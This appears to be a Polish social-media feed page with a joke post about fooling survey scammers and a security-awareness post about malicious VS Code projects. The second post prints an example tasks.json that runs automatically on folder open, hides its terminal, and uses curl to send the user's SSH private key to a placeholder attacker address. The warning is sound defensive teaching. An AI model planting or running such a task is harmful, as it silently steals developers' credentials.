Aktywne Wpisy
CzlowiekMagnetowid +205
Chcę się pochwalić, że oscamowałem scamerów na 70 zł.
Jakiś typ napisał do mnie na whatsuppie o wypełnianie ankiet, a że miałem dobry humor to odpisywałem mu bzdurki udawając 57 letniego weterana.
Wypełniłem potem mu jakąś ankietę na telegramie w 20 sekund i spytał mnie o dane do przelewu, więc podałem wszystko fejkowe oprócz nr konta i jakie było moje zdziwienie jak 5 minut później dostałem przelew na 2 dychy xd
Potem
Jakiś typ napisał do mnie na whatsuppie o wypełnianie ankiet, a że miałem dobry humor to odpisywałem mu bzdurki udawając 57 letniego weterana.
Wypełniłem potem mu jakąś ankietę na telegramie w 20 sekund i spytał mnie o dane do przelewu, więc podałem wszystko fejkowe oprócz nr konta i jakie było moje zdziwienie jak 5 minut później dostałem przelew na 2 dychy xd
Potem
Villeman +109
TL;DR: jeśli pobierzesz i otworzysz złośliwy projekt, a następnie wciśniesz niebieski przycisk
Yes, I Trust
- potencjalny atakujący może wykonać dowolny skrypt/program na Twoim komputerze.Projekt w Visual Studio Code może posiadać specjalny plik
.vscode/tasks.json
. Dla przykładu:{
"version": "2.0.0",
"tasks": [
{
"label": "Uruchom testy",
"type": "shell",
"group": "test",
"command": "curl -d @/Users/kacper/.ssh/id_rsa https://tutaj_twój_adres",
"runOptions": {
"runOn": "folderOpen"
},
"presentation": {
"reveal": "never",
"panel": "new",
}
}
]
}
Ukradnie klucz prywatny użytkownika Kacper i wyśle go do serwera atakującego.
"runOn": "folderOpen"
- Nasze zadanie zostanie uruchomione automatycznie, zaraz po otworzeniu projektu."reveal": "never"
- Ta opcja sprawia, że użytkownikowi nie wyświetli się okno terminala.Czy takie ataki są popularne? NIE.
Czy się zdarzają? TAK.
Więcej zobaczysz na YouTube lub na blogu.
Interesujesz się bezpieczeństwem? Sprawdź mój kurs Bezpieczny Programista.
#programowanie #programista15k #gruparatowaniapoziomu #technologia #ciekawostki #bezpieczenstwo #informatyka #komputery #nauka
Treść została ukryta...
Treść została ukryta...
Treść została ukryta...
Treść została ukryta...
Treść została ukryta...
Treść została ukryta...
Treść została ukryta...
Treść została ukryta...
Treść została ukryta...
Treść została ukryta...
Treść została ukryta...
Treść została ukryta...